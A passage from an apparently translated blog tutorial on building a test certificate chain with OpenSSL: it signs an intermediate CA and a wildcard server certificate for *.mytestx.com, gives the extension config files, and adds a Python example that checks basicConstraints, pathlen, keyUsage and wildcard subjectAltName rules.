<p>c) Use the root CA certificate to sign the intermediate certificate inter.cer, which can in turn issue server certificates.<br><code>openssl x509 -req -days 3650 -CAkey ca.key -CA ca.cer -in inter.csr -CAcreateserial -extfile inter.cnf -extensions v3_ca -out inter.cer</code></p>
<p>inter.cnf configuration file<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">[ v3_ca ]</div><div class="line"></div><div class="line"># Extensions for a typical CA</div><div class="line">subjectKeyIdentifier=hash</div><div class="line">authorityKeyIdentifier=keyid:always,issuer</div><div class="line"># the intermediate certificate must add pathlen:0</div><div class="line">basicConstraints = CA:true,pathlen:0</div><div class="line">keyUsage = cRLSign, keyCertSign</div></pre></td></tr></table></figure></p>
<p>Step 3: Generate the server certificate request</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">openssl genrsa -aes256 -passout pass:123456 -out server.key 4096</div><div class="line">openssl req -new -key server.key -out server.csr -subj "/O=CerTest/OU=Test Certificate Authority/CN=*.mytestx.com"</div></pre></td></tr></table></figure>
<p>Step 4: Sign the server certificate with the intermediate certificate<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">openssl x509 -req -days 365 -sha256 -CA inter.cer -CAkey inter.key -extfile server.cnf -extensions v3_req -CAcreateserial -in server.csr -out server.cer</div></pre></td></tr></table></figure></p>
<p>server.cnf configuration file<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">[ v3_req ]</div><div class="line"># Extensions to add to a certificate request</div><div class="line">basicConstraints = CA:FALSE</div><div class="line">keyUsage = nonRepudiation, digitalSignature, keyEncipherment</div><div class="line">nsCertType = server</div><div class="line">subjectAltName = @alt_names</div><div class="line"></div><div class="line">[ alt_names ]</div><div class="line"># fixes the browser error NET::ERR_CERT_COMMON_NAME_INVALID</div><div class="line">DNS.1 = *.mytestx.com</div><div class="line">DNS.2 = mytestx.com</div></pre></td></tr></table></figure></p>
<blockquote>
<p>Import ca.cer into the local Trusted Root Certification Authorities store and inter.cer into the Intermediate Certification Authorities store. After ca.cer is imported, inter.cer shows as trusted; only once the intermediate certificate has been imported as well is server.cer trusted by the computer.</p>
</blockquote>
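<p>Added example (not the post's code): a Python model of the extension rules that ca.cnf, inter.cnf and server.cnf express, namely CA:true with keyCertSign on every issuer, pathlen:0 on the intermediate, CA:FALSE on the server certificate and wildcard matching of subjectAltName. Certificates are plain dicts holding only the fields these rules need, no X.509 is parsed, and the "Extra Sub CA" is an assumed extra certificate used only to show what pathlen:0 forbids.</p>

```python
# Added example, not the post's code: RFC 5280 basicConstraints / pathLenConstraint /
# keyUsage checks and RFC 6125 DNS-ID matching, applied to a constructed chain
# that mirrors the three config files above.


def hostname_matches(san_entry: str, hostname: str) -> bool:
    """'*' may stand in for exactly one left-most label, so '*.mytestx.com'
    covers www.mytestx.com but neither mytestx.com nor a.b.mytestx.com."""
    san_entry, hostname = san_entry.lower(), hostname.lower()
    if san_entry.startswith("*."):
        suffix = san_entry[1:]                      # ".mytestx.com"
        if not hostname.endswith(suffix):
            return False
        left = hostname[:-len(suffix)]              # what the '*' would replace
        return left != "" and "." not in left
    return san_entry == hostname


def validate_chain(chain: list, hostname: str) -> list:
    """chain = [leaf, intermediate..., root]. Returns the problems found;
    an empty list means the chain is acceptable under these rules."""
    problems = []
    leaf, issuers, root = chain[0], chain[1:], chain[-1]
    # 1. names must link and the chain must end in a self-signed root
    for child, parent in zip(chain, chain[1:]):
        if child["issuer"] != parent["subject"]:
            problems.append(f"{child['subject']} was not issued by {parent['subject']}")
    if root["issuer"] != root["subject"]:
        problems.append("chain does not end in a self-signed root")
    # 2. every issuer needs CA:true and keyCertSign (ca.cnf / inter.cnf)
    for cert in issuers:
        if not cert["ca"]:
            problems.append(f"{cert['subject']} has CA:FALSE but signed a certificate")
        if "keyCertSign" not in cert["key_usage"]:
            problems.append(f"{cert['subject']} lacks keyUsage keyCertSign")
    # 3. pathlen:n allows at most n further CA certificates below that CA;
    #    issuers[depth] has exactly `depth` issuer certificates between it and the leaf
    for depth, cert in enumerate(issuers):
        if cert["pathlen"] is not None and depth > cert["pathlen"]:
            problems.append(f"{cert['subject']} allows pathlen:{cert['pathlen']} "
                            f"but has {depth} CA(s) below it")
    # 4. the leaf must not be a CA and must name the host in its SAN (server.cnf)
    if leaf["ca"]:
        problems.append(f"{leaf['subject']} is a CA certificate used as a server certificate")
    if not any(hostname_matches(s, hostname) for s in leaf["san"]):
        problems.append(f"{hostname} not covered by subjectAltName {leaf['san']} "
                        "(browsers report NET::ERR_CERT_COMMON_NAME_INVALID)")
    return problems


# Constructed chain mirroring ca.cnf, inter.cnf and server.cnf
ROOT = {"subject": "Test Root CA", "issuer": "Test Root CA", "ca": True,
        "pathlen": None, "key_usage": {"cRLSign", "keyCertSign"}, "san": []}
INTER = {"subject": "Test Intermedia CA", "issuer": "Test Root CA", "ca": True,
         "pathlen": 0, "key_usage": {"cRLSign", "keyCertSign"}, "san": []}
SERVER = {"subject": "*.mytestx.com", "issuer": "Test Intermedia CA", "ca": False,
          "pathlen": None, "san": ["*.mytestx.com", "mytestx.com"],
          "key_usage": {"nonRepudiation", "digitalSignature", "keyEncipherment"}}
# Assumed extra CA one level below the pathlen:0 intermediate, which inter.cnf forbids
SUB_CA = {"subject": "Extra Sub CA", "issuer": "Test Intermedia CA", "ca": True,
          "pathlen": None, "key_usage": {"keyCertSign"}, "san": []}
SERVER_VIA_SUB = dict(SERVER, issuer="Extra Sub CA")

if __name__ == "__main__":
    print(validate_chain([SERVER, INTER, ROOT], "www.mytestx.com"))
    print(validate_chain([SERVER_VIA_SUB, SUB_CA, INTER, ROOT], "www.mytestx.com"))
```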